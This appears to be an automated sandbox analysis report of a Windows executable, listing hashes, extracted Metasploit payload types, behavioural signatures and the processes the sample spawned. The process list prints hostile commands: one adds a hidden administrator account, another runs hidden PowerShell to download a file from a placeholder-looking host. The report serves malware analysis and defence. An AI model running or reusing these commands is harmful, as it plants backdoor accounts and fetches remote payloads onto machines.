Analysis
-
max time kernel
139s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-06-2024 09:02
Behavioral task
behavioral1
Sample
sample1.exe
Resource
win7-20240221-en
General
-
Target
sample1.exe
-
Size
83KB
-
MD5
dec37e4b834cf3a9a78475fec06255db
-
SHA1
bc6a9f3dd99e40dfe34ba8c64401027a3d86d2bc
-
SHA256
075a8576bb2f75bf56cfa8c88727011ac66f176ca5abe2a78978c556577e5058
-
SHA512
8402a9206285014fe6ab3752433835a7f907406d2c5fb23204a567d3f9940c844578ee525c64b6a67d81bf0983e7d3972fb2380d822cc9fd08eec098749d4a77
-
SSDEEP
1536:Icus7AQXjNta73Jah9UFBD3JMb+KR0Nc8QsJq3Gnq3+/q3DlHq3/:lAYhta7ouJe0Nc8QsCzDDm/
Malware Config
Extracted
http://web.danger.mal/danger
Extracted
metasploit
windows/exec
Extracted
metasploit
windows/shell_bind_tcp
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 2028 powershell.exe Token: 33 1576 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1576 AUDIODG.EXE Token: 33 1576 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1576 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
sample1.exedescription pid process target process PID 2696 wrote to memory of 2028 2696 sample1.exe powershell.exe PID 2696 wrote to memory of 2028 2696 sample1.exe powershell.exe PID 2696 wrote to memory of 2028 2696 sample1.exe powershell.exe PID 2696 wrote to memory of 2028 2696 sample1.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample1.exe"C:\Users\Admin\AppData\Local\Temp\sample1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user TestUser S3cret^S3cret /ADD && net localgroup Administrators TestUser /ADD2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy bypass -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://web.danger.mal/danger','C:/danger')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5001⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2028-5-0x0000000073E41000-0x0000000073E42000-memory.dmpFilesize
4KB
-
memory/2028-6-0x0000000073E40000-0x00000000743EB000-memory.dmpFilesize
5.7MB
-
memory/2028-7-0x0000000073E40000-0x00000000743EB000-memory.dmpFilesize
5.7MB
-
memory/2028-9-0x0000000073E40000-0x00000000743EB000-memory.dmpFilesize
5.7MB
-
memory/2028-8-0x0000000073E40000-0x00000000743EB000-memory.dmpFilesize
5.7MB
-
memory/2028-10-0x0000000073E40000-0x00000000743EB000-memory.dmpFilesize
5.7MB
-
memory/2696-0-0x0000000000400000-0x000000000041B1FC-memory.dmpFilesize
108KB
-
memory/2696-1-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB
-
memory/2696-2-0x0000000000400000-0x000000000041B1FC-memory.dmpFilesize
108KB